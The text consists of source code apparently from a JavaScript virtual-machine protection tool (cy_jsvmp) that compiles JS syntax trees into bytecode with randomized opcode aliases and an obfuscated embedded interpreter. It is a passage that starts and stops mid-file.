zhili.push(47)
break
case "NewExpression":
let callargsNum = node.arguments.length;
for (let i =0; i< node.arguments.length; i++){
startgetType(node.arguments[i], variablePool, zhili,come)
}
startgetType(node.callee, variablePool,zhili,come)
zhili.push(46)
zhili.push(callargsNum)
break
case "ReturnStatement":
if (come){
startgetType(node.argument, variablePool, zhili,come)
zhili.push(1814)
zhili.push(1816)
}else {
startgetType(node.argument, variablePool, zhili,come)
zhili.push(-1)
}
break
default:
console.log(generator(node).code)
console.log("is not jiex");
}
}
// Compile a protected "cbb_"-prefixed function. Unlike startfun(), the
// instructions are appended to the SHARED codeOfmyfun buffer; `af` records
// this unit's start offset inside that buffer and `isfunmr:1` flags the
// shared-buffer calling convention.
function startfun2(node2){
let name = "awcbb_yhh_fun"+numberKuai
numberKuai += 1
// Offset of this unit's first instruction within the shared buffer.
var fyyy = codeOfmyfun.length
changlc[name] = {"variablePool":{}
, "zhili": codeOfmyfun,
"af":fyyy,
"isfunmr":1,
}
// Parameters are bound in REVERSE declaration order (stack convention),
// each via the opcode sequence 23, 10, <name index>, 1815.
for (let iy =0; iy< node2.params.length; iy++){
let i = node2.params.length-iy-1;
if (node2.params[i].type === "AssignmentPattern"){
// Default-valued parameter: compile the default expression first.
changlc[name]['variablePool'][node2.params[i].left.name] = null
startgetType(node2.params[i], changlc[name]['variablePool'], changlc[name]['zhili'],1)
changlc[name]['zhili'].push(23)
changlc[name]['zhili'].push(10)
changlc[name]['zhili'].push(toPool(node2.params[i].left.name))
changlc[name]['zhili'].push(1815)
}else {
changlc[name]['variablePool'][node2.params[i].name] = null
changlc[name]['zhili'].push(23)
changlc[name]['zhili'].push(10)
changlc[name]['zhili'].push(toPool(node2.params[i].name))
changlc[name]['zhili'].push(1815)
}
}
// come=1: ReturnStatement lowers to the protected-mode opcodes 1814/1816.
startgetType(node2.body, changlc[name]['variablePool'], changlc[name]['zhili'], 1)
// Prologue: starts with the "cbbiyhh.online" constant (watermark-like
// marker — purpose not visible here), then hoists nested function names;
// opcode 1 terminates it. It is spliced in at the unit's own offset fyyy.
let hb = []
hb.push(10)
hb.push(toPool("cbbiyhh.online"))
for (let i in changlc[name]['variablePool']){
if (changlc[name]['variablePool'][i] && changlc[name]['variablePool'][i].indexOf("awcbb_yhh_fun") != -1){
hb.push(10)
hb.push(toPool(i))
}
}
hb.push(1)
let f = hb.length
for (let i =0;i< f; i++){
changlc[name]['zhili'].splice(fyyy,0,hb.pop())
}
// Drop the alias to the shared buffer so JSON.stringify(changlc) does not
// duplicate codeOfmyfun (it is serialized separately in the output blob).
delete changlc[name]['zhili']
}
// Compile a regular (non-"cbb_") function into its own bytecode unit,
// registered in changlc under a fresh "awcbb_yhh_fun<N>" name.
function startfun(node2){
let name = "awcbb_yhh_fun"+numberKuai
numberKuai += 1
changlc[name] = {"variablePool":{}
, "zhili": []}
// Bind parameters: each name is emitted as the pair (10, <pool index>);
// defaults (AssignmentPattern) compile their initializer expression first.
for (let i =0; i< node2.params.length; i++){
if (node2.params[i].type === "AssignmentPattern"){
changlc[name]['variablePool'][node2.params[i].left.name] = null
startgetType(node2.params[i], changlc[name]['variablePool'], changlc[name]['zhili'])
changlc[name]['zhili'].push(10)
changlc[name]['zhili'].push(toPool(node2.params[i].left.name))
}else {
changlc[name]['variablePool'][node2.params[i].name] = null
changlc[name]['zhili'].push(10)
changlc[name]['zhili'].push(toPool(node2.params[i].name))
}
}
// Opcode 2 separates the parameter section from the body.
changlc[name]['zhili'].push(2)
startgetType(node2.body, changlc[name]['variablePool'], changlc[name]['zhili'])
// Prologue: hoist nested compiled-function names; opcode 1 ends it.
// Reverse-popping while inserting at index 0 preserves its order.
let hb = []
for (let i in changlc[name]['variablePool']){
if (changlc[name]['variablePool'][i] && changlc[name]['variablePool'][i].indexOf("awcbb_yhh_fun") != -1){
hb.push(10)
hb.push(toPool(i))
}
}
hb.push(1)
let f = hb.length
for (let i =0;i< f; i++){
changlc[name]['zhili'].splice(0,0,hb.pop())
}
}
// Compile the top-level Program node into the root bytecode unit.
function start(node2){
let name = "awcbb_yhh_fun"+numberKuai
numberKuai += 1
changlc[name] = {"variablePool":{}
, "zhili": []}
let node = node2.program.body
// Emit all top-level statements in source order.
for (let i = 0; i < node.length; i++){
startgetType(node[i], changlc[name]['variablePool'], changlc[name]['zhili'])
}
// Prologue: hoist nested compiled-function names; opcode 1 ends it.
let hb = []
for (let i in changlc[name]['variablePool']){
if (changlc[name]['variablePool'][i] && changlc[name]['variablePool'][i].indexOf("awcbb_yhh_fun") != -1){
hb.push(10)
hb.push(toPool(i))
}
}
hb.push(1)
let f = hb.length
for (let i =0;i< f; i++){
changlc[name]['zhili'].splice(0,0,hb.pop())
}
}
// Compile the whole AST, then assemble the output payload: an IIFE that
// defines codeOfmyfun / constantPool / changlc and inlines the interpreter
// template (dataText2).
start(ast)
cood = ``
datatext = "(function(){\nvar cywindow = this; var codeOfmyfun = "+ JSON.stringify(codeOfmyfun)+";var constantPool = "+ JSON.stringify(constantPool)+"; var changlc = "+ JSON.stringify(changlc)+";\n"+dataText2+"})()";
fs.writeFileSync(outpath, cood + datatext, (e)=>{})
}
// The JS file to protect/compile.
const soure = "t3.js"
const outpath = "./outsrc/out.js"
cbbjsvmp(soure,outpath)
// The ES6-conversion plugin is broken; see the README for a workaround.
// if (offes5 ===1){
// process.exec(`traceur --script ./src/${soure} --out ./dist/${soure}`, (error, stdout, stderr) => {
// if (!error) {
// console.log("es6 to es5 ==> 成功");
// cbbjsvmp()
// console.log("file is save ==> ./outsrc/out.js");
// } else {
// console.log("es6 to es5 ==> 失败");
// }
// });
// } else {
// cbbjsvmp()
// console.log("file is save ==> ./outsrc/out.js");
// }
2833844911/cy_jsvmp | 34,182 | jiamian.js | const parser = require("@babel/parser");
const generator = require("@babel/generator").default;
const fs = require("fs");
const {renameCj} = require("./tool/rename");
const {hsjsvmpTo} = require("./tool/gooutmvp");
const {switchtoif} = require("./tool/switchtoif");
const {bindfun} = require("./tool/bindfun");
const {tosanyuan} = require("./tool/tosanyuan")
const {es6toes5} = require("./tool/es5toes6");
const process = require("child_process");
// Whether to transpile the input to ES5 first (1 = yes).
offes5 = 0
// Counter giving each for-in loop a unique set of synthetic loop variables.
var fornum = 0
// Map from binary-operator token to its canonical VM opcode number.
var dat = {"instanceof":1811,"+":20, "<":24, "*":27, "%":28, "^":29, "/":30, "<<":31, "|":32, ">>":33, ">>>":34, "&":35, "-":19, "<=": 36, ">=":37,">":38,"==":39,
"===":53,"!==":54,
"!=":550,"in":551}
// datkey becomes the compound-assignment forms ("+=", "*=", …) used when
// lowering AssignmentExpression nodes.
var datkey = Object.keys(dat)
for (let i = 0; i< datkey.length; i++){
datkey[i] = datkey[i]+"="
}
// Return a randomly shuffled shallow copy of `data`; the input array is
// left untouched. Implements the "pick a random untaken element, then plug
// the hole with the last untaken element" variant of Fisher–Yates.
//
// Fix: the original used a do-while loop, so an EMPTY input executed one
// iteration and returned [undefined] instead of []. A plain for-loop
// handles length 0 correctly and is otherwise behaviorally identical.
function RandDataArray(data) {
    var work = [].concat(data);   // shallow copy protects the caller's array
    var shuffled = [];
    var total = work.length;
    for (var taken = 0; taken < total; taken++) {
        var remaining = total - taken;                  // untaken slots left in `work`
        var pick = Math.floor(Math.random() * remaining);
        shuffled.push(work[pick]);
        work[pick] = work[remaining - 1];               // move last untaken into the hole
    }
    return shuffled;
}
// Canonical opcode values used by the emitter.
var zhil = [
1811,1810,551, 550, 291, 290, 252, 240, 200, 197, 195, 194, 192, 190, 181, 150, 105, 104, 90, 60, 58, 57, 56, 55, 54, 53, 52, 51, 50, 49, 48, 47, 46, 45, 44, 40, 39, 38, 37, 36, 35, 34, 33, 32, 31, 30, 29, 28, 27, 26, 25, 24, 23, 22, 20, 19, 11, 10, 8, 2, 1
]
// Shuffle 0..99999, then hand each canonical opcode 30 random aliases
// (zhilDx["z<op>"]); the emitter later picks one alias per emission via
// RandDataCheise, so identical operations don't share a byte pattern.
zhenzhil = []
for (let i = 0; i < 100000; i++){
zhenzhil.push(i)
}
zhenzhil = RandDataArray(zhenzhil)
zhilDx = {}
for (let i2 = 0; i2 <zhil.length; i2++ ){
zhilDx["z"+zhil[i2]] = []
for (let i =0; i < 30; i++){
zhilDx["z"+zhil[i2]].push(zhenzhil.pop())
}
}
// Persist the alias map so the matching interpreter can be generated with
// the same opcode numbering.
var d = JSON.stringify(zhilDx) +""
fs.writeFileSync("./dist/jiamain.json", d, (e)=>{})
// Pick one element of `data` uniformly at random.
function RandDataCheise(data) {
    return data[Math.floor(Math.random() * data.length)];
}
// Load the custom-stack template (cshshuzduei.js), rename its stack method
// names (pop/push/shift/xujia/length -> cf/cF/Cf/CF/CFf), and splice in a
// randomized "cbbN" linked chain replacing the CbbTHALLYhh placeholder.
// The chain entries look like "cbbX": [prevName, nextName, undefined] —
// presumably an obfuscated linked list walked by the runtime (confirm
// against cshshuzduei.js, not visible here).
function getchhduei(){
var duei = fs.readFileSync("./tool/cshshuzduei.js") + '';
duei = duei.replace(/this\.pop/g, "this.cf")
duei = duei.replace(/this\.push/g, "this.cF")
duei = duei.replace(/this\.shift/g, "this.Cf")
duei = duei.replace(/this\.xujia/g, "this.CF")
duei = duei.replace(/this\.length/g, "this.CFf")
// Random permutation of 2..999 decides the chain order; cbb1 is the head.
var hu = []
for (var i = 2; i< 1000; i++){
hu.push(i)
}
hu = RandDataArray(hu)
var dat = '{"cbb1": [undefined, "cbbbhhhh", undefined],'
var sc = 1
for (let i =0; i< hu.length; i++){
// Patch the previous entry's "next" placeholder, then append this entry.
dat = dat.replace("cbbbhhhh","cbb"+hu[i])
var d = `"${"cbb"+hu[i]}": ["${"cbb"+sc}", "cbbbhhhh", undefined],`
dat += d
sc = hu[i]
}
// Last entry's "next" placeholder becomes empty (end of chain).
dat = dat.replace("cbbbhhhh","")
dat += '};'
duei = duei.replace("CbbTHALLYhh", dat)
return duei;
}
// Hardened variant of the compiler: same pipeline as main_pro.js, but the
// interpreter template itself is obfuscated before embedding.
// (Function body continues beyond this excerpt.)
function cbbjsvmp(soure, outpath){
var dataText
if (offes5 === 1){
dataText = fs.readFileSync("./dist/"+soure) + '';
}else {
dataText = fs.readFileSync("./src/"+soure) + '';
}
// Interpreter = randomized stack template + VM core, then method renames
// mirroring the this.* renames done in getchhduei().
var dataText2 = getchhduei() + fs.readFileSync("./tool/jsvmp_outcs.js") + '';
dataText2 = dataText2.replace(/duei\.pop/g, "duei.cf")
dataText2 = dataText2.replace(/duei\.push/g, "duei.cF")
dataText2 = dataText2.replace(/duei\.shift/g, "duei.Cf")
dataText2 = dataText2.replace(/duei\.xujia/g, "duei.CF")
dataText2 = dataText2.replace(/duei\.length/g, "duei.CFf")
dataText2 = dataText2.replace(/g2\.pop/g, "g2.cf")
dataText2 = dataText2.replace(/g2\.push/g, "g2.cF")
dataText2 = dataText2.replace(/g2\.shift/g, "g2.Cf")
dataText2 = dataText2.replace(/g2\.xujia/g, "g2.CF")
dataText2 = dataText2.replace(/g2\.length/g, "g2.CFf")
// Expand/alias the opcode set in the interpreter.
dataText2 = hsjsvmpTo(dataText2)
// Hide helper functions.
dataText2 = bindfun(dataText2)
// Rewrite switch statements into if/else chains.
dataText2 = switchtoif(dataText2)
// Transpile the input to ES5 before parsing.
dataText = es6toes5(dataText)
// Fold statements into ternary expressions (300 passes).
for (let i = 0; i< 300; i++){
dataText2 = tosanyuan(dataText2)
}
var changlc = {}
var constantPool = []
var ast = parser.parse(dataText)
// Normalize identifiers via the rename plugin.
ast = renameCj(ast)
var numberKuai = 0
// Append every element of `newl` onto `sour`, in order (in-place concat).
function copyArrayList(sour, newl){
for (let i = 0; i < newl.length; i++){
sour.push(newl[i])
}
}
// Intern `value` in the shared constantPool and return its index;
// identical constants share one slot (linear indexOf search).
function toPool(value){
var a1,a2
a1 = constantPool.indexOf(value)
if (a1 == -1){
a2 = constantPool.length
constantPool.push(value)
return a2
}else{
return a1
}
}
function startgetType(node, variablePool, zhili){
if (node == null){
return;
}
var a1,a2,a3,a4,a5;
switch(node.type){
case "EmptyStatement":
break
case "ConditionalExpression":
case "IfStatement":
startgetType(node.test, variablePool, zhili);
zhili.push(RandDataCheise(zhilDx.z192))
let ujj3 = []
startgetType(node.alternate, variablePool, ujj3)
zhili.push(ujj3.length + 2)
copyArrayList(zhili,ujj3)
zhili.push(RandDataCheise(zhilDx.z190))
let ujj2 = []
startgetType(node.consequent, variablePool, ujj2)
zhili.push(ujj2.length)
copyArrayList(zhili,ujj2)
break
case "VariableDeclaration":
for (let i=0;i< node.declarations.length; i++){
startgetType(node.declarations[i], variablePool, zhili)
}
break
case "ForInStatement":
fornum += 1
let fbme = fornum
startgetType(node.right, variablePool,zhili)
zhili.push(RandDataCheise(zhilDx.z57))
zhili.push(fbme)
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool( 0))
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z22))
zhili.push(toPool("for_in_xh_cbb"+fbme))
let fggg = zhili.length
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool("for_in_xh_cbb"+fbme))
zhili.push(RandDataCheise(zhilDx.z181))
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool("for_in_xh_cbb_list"+fbme))
zhili.push(RandDataCheise(zhilDx.z181))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool("length"))
zhili.push(RandDataCheise(zhilDx.z181))
zhili.push(RandDataCheise(zhilDx.z240))
zhili.push(RandDataCheise(zhilDx.z25))
let dyyy = []
if (node.left.type === "VariableDeclaration"){
startgetType(node.left, variablePool,dyyy)
startgetType(node.left.declarations[0].id, variablePool,dyyy)
}else {
startgetType(node.left, variablePool,dyyy)
}
dyyy.pop()
dyyy.push(RandDataCheise(zhilDx.z23))
dyyy.push(RandDataCheise(zhilDx.z10))
dyyy.push(toPool( "for_in_xh_cbb_list"+fbme))
dyyy.push(RandDataCheise(zhilDx.z181))
dyyy.push(RandDataCheise(zhilDx.z23))
dyyy.push(RandDataCheise(zhilDx.z10))
dyyy.push(toPool("for_in_xh_cbb"+fbme))
dyyy.push(RandDataCheise(zhilDx.z181))
dyyy.push(RandDataCheise(zhilDx.z181))
dyyy.push(RandDataCheise(zhilDx.z90))
startgetType(node.body,variablePool,dyyy)
dyyy.push(RandDataCheise(zhilDx.z23))
dyyy.push(RandDataCheise(zhilDx.z26))
dyyy.push(toPool("for_in_xh_cbb"+fbme))
dyyy.push(RandDataCheise(zhilDx.z190))
dyyy.push(fggg - zhili.length -dyyy.length -2 )
let bbblenko = dyyy.length
for (let i =0; i< bbblenko; i++){
if (dyyy[i] == "cbb_break_in_the_this_yhh_417"){
dyyy[i] = RandDataCheise(zhilDx.z190);
dyyy[i+1] = bbblenko - i - 2
}else if (dyyy[i] == "cbb_continue_in_the_this_yhh_417"){
dyyy[i] = RandDataCheise(zhilDx.z190);
dyyy[i+1] = bbblenko - i - 7
}
}
zhili.push(dyyy.length)
copyArrayList(zhili, dyyy)
break
case "UpdateExpression":
startgetType(node.argument, variablePool, zhili)
if (node.operator =="++"){
// zhili.push(26)
zhili.pop()
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(1))
startgetType(node.argument, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z20))
zhili.push(RandDataCheise(zhilDx.z90))
startgetType(node.argument, variablePool, zhili)
}else if (node.operator =="--"){
zhili.pop()
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(1))
startgetType(node.argument, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z19))
zhili.push(RandDataCheise(zhilDx.z90))
startgetType(node.argument, variablePool, zhili)
}
break
case "LabeledStatement":
let vbvb = [];
let vbvbname = node.label.name;
startgetType(node.body, variablePool, vbvb)
for (var ff=0; ff<vbvb.length; ff++){
if (vbvb[ff] === vbvbname){
vbvb[ff] = RandDataCheise(zhilDx.z190);;
vbvb[ff+1] = vbvb.length - ff-2;
}
}
copyArrayList(zhili, vbvb)
break
case "BreakStatement":
if (node.label){
zhili.push(node.label.name)
zhili.push(undefined)
}else {
zhili.push("cbb_break_in_the_this_yhh_417")
zhili.push(undefined)
}
break
case "DebuggerStatement":
zhili.push(RandDataCheise(zhilDx.z194))
break
case "ForStatement":
startgetType(node.init, variablePool,zhili)
let lenko = zhili.length
startgetType(node.test, variablePool,zhili)
if (node.test == null)
{
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(true))
}
zhili.push(RandDataCheise(zhilDx.z25))
let fgfgfdsujj = []
startgetType(node.body, variablePool, fgfgfdsujj)
startgetType(node.update, variablePool, fgfgfdsujj)
fgfgfdsujj.push(RandDataCheise(zhilDx.z190))
fgfgfdsujj.push(lenko - zhili.length - fgfgfdsujj.length -2)
zhili.push(fgfgfdsujj.length)
lenko = fgfgfdsujj.length
for (let i =0; i< lenko; i++){
if (fgfgfdsujj[i] == "cbb_break_in_the_this_yhh_417"){
fgfgfdsujj[i] = RandDataCheise(zhilDx.z190);
fgfgfdsujj[i+1] = lenko - i - 2
}else if (fgfgfdsujj[i] == "cbb_continue_in_the_this_yhh_417"){
fgfgfdsujj[i] = RandDataCheise(zhilDx.z190);
fgfgfdsujj[i+1] = lenko - i - 4
}
}
copyArrayList(zhili, fgfgfdsujj)
break
case "WhileStatement":
let ffflenko = zhili.length
startgetType(node.test, variablePool,zhili)
zhili.push(RandDataCheise(zhilDx.z25))
let jiiiujj = []
startgetType(node.body, variablePool, jiiiujj)
jiiiujj.push(RandDataCheise(zhilDx.z190))
jiiiujj.push(ffflenko - zhili.length - jiiiujj.length -2)
zhili.push(jiiiujj.length)
ffflenko = jiiiujj.length
for (let i =0; i< ffflenko; i++){
if (jiiiujj[i] == "cbb_break_in_the_this_yhh_417"){
jiiiujj[i] = RandDataCheise(zhilDx.z190);
jiiiujj[i+1] = ffflenko - i - 2
}else if (jiiiujj[i] == "cbb_continue_in_the_this_yhh_417"){
jiiiujj[i] = RandDataCheise(zhilDx.z190);
jiiiujj[i+1] = ffflenko - i - 4
}
}
copyArrayList(zhili, jiiiujj)
break
case "DoWhileStatement":
let lenko2 = zhili.length
let ujj = []
startgetType(node.body, variablePool,ujj)
// ujj.push(190)
// ujj.push(lenko - zhili.length -ujj.length-2)
lenkoe = ujj.length
for (let i =0; i< lenkoe; i++){
if (ujj[i] == "cbb_break_in_the_this_yhh_417"){
ujj[i] = RandDataCheise(zhilDx.z190);
ujj[i+1] = lenkoe - i - 2
}else if (ujj[i] == "cbb_continue_in_the_this_yhh_417"){
ujj[i] = RandDataCheise(zhilDx.z190);
ujj[i+1] = lenkoe - i - 4
}
}
copyArrayList(zhili, ujj)
startgetType(node.test, variablePool,zhili)
zhili.push(RandDataCheise(zhilDx.z192))
zhili.push(lenko2-zhili.length-1)
break
case "ContinueStatement":
zhili.push("cbb_continue_in_the_this_yhh_417")
zhili.push(undefined)
break
case "VariableDeclarator":
variablePool[node.id.name] = null;
if (node.init != null){
startgetType(node.init, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z22))
a1 = constantPool.indexOf(node.id.name)
if (a1 == -1){
zhili.push(constantPool.length)
constantPool.push(node.id.name)
}else{
zhili.push(a1)
}
}
break
case "SwitchStatement":
startgetType(node.discriminant, variablePool,zhili)
let hu = node.cases.length
let zwdz = [];
let gggcbb = []
for (let i = 0;i < hu; i++){
let litshuz = []
if (node.cases[i].test == null){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool( null))
}else{
startgetType(node.cases[i].test, variablePool, zhili)
}
zwdz.push(gggcbb.length)
// 块
for (let i2 = 0; i2 < node.cases[i].consequent.length; i2++){
startgetType(node.cases[i].consequent[i2], variablePool, litshuz)
}
copyArrayList(gggcbb, litshuz)
}
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool( null))
for (let i = 0;i < zwdz.length; i++){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(zwdz[i]))
}
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(gggcbb.length))
zhili.push(RandDataCheise(zhilDx.z48))
zhili.push(hu+1)
let oolenko = gggcbb.length
for (let i =0; i< oolenko; i++){
if (gggcbb[i] == "cbb_break_in_the_this_yhh_417"){
gggcbb[i] = RandDataCheise(zhilDx.z190);
gggcbb[i+1] = oolenko - i -2
}
}
copyArrayList(zhili, gggcbb)
break
case "LogicalExpression":
if (node.operator == "&&"){
startgetType(node.left, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z51))
let bh = []
startgetType(node.right, variablePool, bh)
zhili.push(bh.length)
copyArrayList(zhili, bh)
}else if (node.operator == "||"){
startgetType(node.left, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z252))
let bh = []
startgetType(node.right, variablePool, bh)
zhili.push(bh.length)
copyArrayList(zhili, bh)
}
break
case "BooleanLiteral":
case "NumericLiteral":
case "NullLiteral":
case "StringLiteral":
zhili.push(RandDataCheise(zhilDx.z10))
a1 = constantPool.indexOf(node.value)
zhili.push(toPool(node.value))
break;
case "Identifier":
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(node.name))
zhili.push(RandDataCheise(zhilDx.z181))
break
case "MemberExpression":
startgetType(node.object, variablePool, zhili)
if (node.property.type == "Identifier" && node.computed == false){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(node.property.name))
zhili.push(RandDataCheise(zhilDx.z181))
}else if (node.property.type == "NumericLiteral" || node.property.type == "StringLiteral"){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(node.property.value))
zhili.push(RandDataCheise(zhilDx.z181))
}else{
startgetType(node.property, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z181))
}
break
case "BinaryExpression":
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx["z"+dat[node.operator]]))
break
case "UnaryExpression":
if (node.argument.type == "NumericLiteral" || node.argument.type == "BooleanLiteral" || node.argument.type == "StringLiteral"){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool( node.argument.value))
}else{
startgetType(node.argument, variablePool, zhili)
}
if (node.operator == "~"){
zhili.push(RandDataCheise(zhilDx.z44))
}else if (node.operator == "typeof"){
zhili.push(RandDataCheise(zhilDx.z49))
}else if (node.operator == "!"){
zhili.push(RandDataCheise(zhilDx.z60))
}else if (node.operator == "-"){
zhili.push(RandDataCheise(zhilDx.z50))
}else if (node.operator == "delete"){
zhili.pop()
zhili.push(RandDataCheise(zhilDx.z55))
}else if (node.operator == "void"){
zhili.push(RandDataCheise(zhilDx.z56))
}
break
case "CallExpression":
for (let i = 0; i < node.arguments.length; i++){
startgetType(node.arguments[i], variablePool, zhili)
}
startgetType(node.callee, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z150))
zhili.push(node.arguments.length)
break
case "FunctionDeclaration":
variablePool[node.id.name] = "awcbb_yhh_fun"+numberKuai
startfun(node)
break
case "ArrowFunctionExpression":
case "FunctionExpression":
let bcxh
if (node.id){
bcxh = "awcbb_yhh_fun"+numberKuai
variablePool[node.id.name] = bcxh
startfun(node)
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(node.id.name))
zhili.push(RandDataCheise(zhilDx.z181))
}else {
bcxh = "awcbb_yhh_fun"+numberKuai
variablePool[bcxh] = bcxh
startfun(node)
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(bcxh))
zhili.push(RandDataCheise(zhilDx.z181))
}
break
case "SequenceExpression":
var d,ohh;
for (let i=0; i< node.expressions.length; i++){
startgetType(node.expressions[i], variablePool, zhili)
if (node.expressions[i].type === "CallExpression" || node.expressions[i].type === "Identifier" || node.expressions[i].type === "MemberExpression"
|| node.expressions[i].type === "BooleanLiteral"|| node.expressions[i].type === "NumericLiteral"
|| node.expressions[i].type === "NullLiteral"|| node.expressions[i].type === "StringLiteral"
|| node.expressions[i].type === "FunctionExpression"
|| node.expressions[i].type === "UnaryExpression"
|| node.expressions[i].type === "BinaryExpression"
|| node.expressions[i].type === "SequenceExpression"
|| node.expressions[i].type === "UpdateExpression"
|| node.expressions[i].type === "AssignmentExpression"
|| node.expressions[i].type === "LogicalExpression"
|| node.expressions[i].type === "ConditionalExpression"
|| true
){
d = zhili.push(RandDataCheise(zhilDx.z1810))
ohh = 1
}else {
ohh =0
}
}
if (ohh === 1){
zhili.pop()
}else {
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(undefined))
}
break
case "ObjectExpression":
zhili.push(RandDataCheise(zhilDx.z104))
for (let i=0; i< node.properties.length; i++){
startgetType(node.properties[i], variablePool, zhili)
}
break
case "ThrowStatement":
startgetType(node.argument, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z58))
break
case "ObjectProperty":
if (node.key.type == "Identifier"){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(node.key.name))
}else{
startgetType(node.key, variablePool,zhili)
}
startgetType(node.value, variablePool,zhili)
zhili.push(RandDataCheise(zhilDx.z45))
break
case "ArrayExpression":
zhili.push(RandDataCheise(zhilDx.z105))
for (let i=0; i< node.elements.length; i++){
startgetType(node.elements[i], variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z40))
}
break;
case "RegExpLiteral":
zhili.push(RandDataCheise(zhilDx.z8))
zhili.push(toPool( node.pattern))
zhili.push(toPool( node.flags))
break
case "TryStatement":
zhili.push(RandDataCheise(zhilDx.z195))
let bcnxbc = []
startgetType(node.block, variablePool, bcnxbc)
bcnxbc.push(RandDataCheise(zhilDx.z200))
zhili.push(bcnxbc.length)
if (node.handler != null){
variablePool[node.handler.param.name] = null
startgetType(node.handler.param, variablePool, bcnxbc)
bcnxbc.pop()
bcnxbc.push(RandDataCheise(zhilDx.z197))
startgetType(node.handler.body, variablePool, bcnxbc)
}
bcnxbc.push(RandDataCheise(zhilDx.z200))
zhili.push(bcnxbc.length - zhili[zhili.length-1])
if (node.finalizer != null){
startgetType(node.finalizer, variablePool, bcnxbc)
}
bcnxbc.push(RandDataCheise(zhilDx.z200))
zhili.push(bcnxbc.length - zhili[zhili.length-1]- zhili[zhili.length-2])
copyArrayList(zhili, bcnxbc)
break
case "AssignmentPattern":
case "AssignmentExpression":
if (node.operator == '+='){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z20))
zhili.push(RandDataCheise(zhilDx.z90))
}else if (node.operator == '-='){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z291))
zhili.push(RandDataCheise(zhilDx.z90))
}else if (node.operator == '|='){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z32))
zhili.push(RandDataCheise(zhilDx.z90))
}else if(datkey.indexOf(node.operator) != -1){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx["z"+dat[node.operator.replace("=","")]]))
zhili.push(RandDataCheise(zhilDx.z90))
}else{
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.right, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z290))
}
// startgetType(node.left, variablePool, zhili)
break;
case "ExpressionStatement":
startgetType(node.expression, variablePool, zhili)
break
case "BlockStatement":
for (a1= 0; a1< node.body.length; a1++){
startgetType(node.body[a1], variablePool, zhili)
}
break
case "ThisExpression":
zhili.push(RandDataCheise(zhilDx.z47))
break
case "NewExpression":
let callargsNum = node.arguments.length;
for (let i =0; i< node.arguments.length; i++){
startgetType(node.arguments[i], variablePool, zhili)
}
startgetType(node.callee, variablePool,zhili)
zhili.push(RandDataCheise(zhilDx.z46))
zhili.push(callargsNum)
break
case "ReturnStatement":
startgetType(node.argument, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z200))
break
default:
console.log(generator(node).code)
console.log("is not jiex");
}
}
// Compile a function AST node into its own bytecode unit named
// "awcbb_yhh_fun<N>". The unit is registered in the global `changlc` table;
// parameter-binding instructions are emitted first, then the body, and
// finally a load sequence for every nested function is prepended.
function startfun(node2) {
    const unitName = "awcbb_yhh_fun" + numberKuai;
    numberKuai += 1;
    const unit = { "variablePool": {}, "zhili": [] };
    changlc[unitName] = unit;

    // Emit one "push parameter name" pair per formal parameter.
    for (const param of node2.params) {
        if (param.type === "AssignmentPattern") {
            // Default-valued parameter: compile the default expression first.
            unit.variablePool[param.left.name] = null;
            startgetType(param, unit.variablePool, unit.zhili);
            unit.zhili.push(RandDataCheise(zhilDx.z10));
            unit.zhili.push(toPool(param.left.name));
        } else {
            unit.variablePool[param.name] = null;
            unit.zhili.push(RandDataCheise(zhilDx.z10));
            unit.zhili.push(toPool(param.name));
        }
    }
    unit.zhili.push(RandDataCheise(zhilDx.z2));

    // Compile the function body into this unit's instruction stream.
    startgetType(node2.body, unit.variablePool, unit.zhili);

    // Prepend load instructions for every nested function declaration so
    // they are bound before the body executes.
    const prologue = [];
    for (const varName in unit.variablePool) {
        const bound = unit.variablePool[varName];
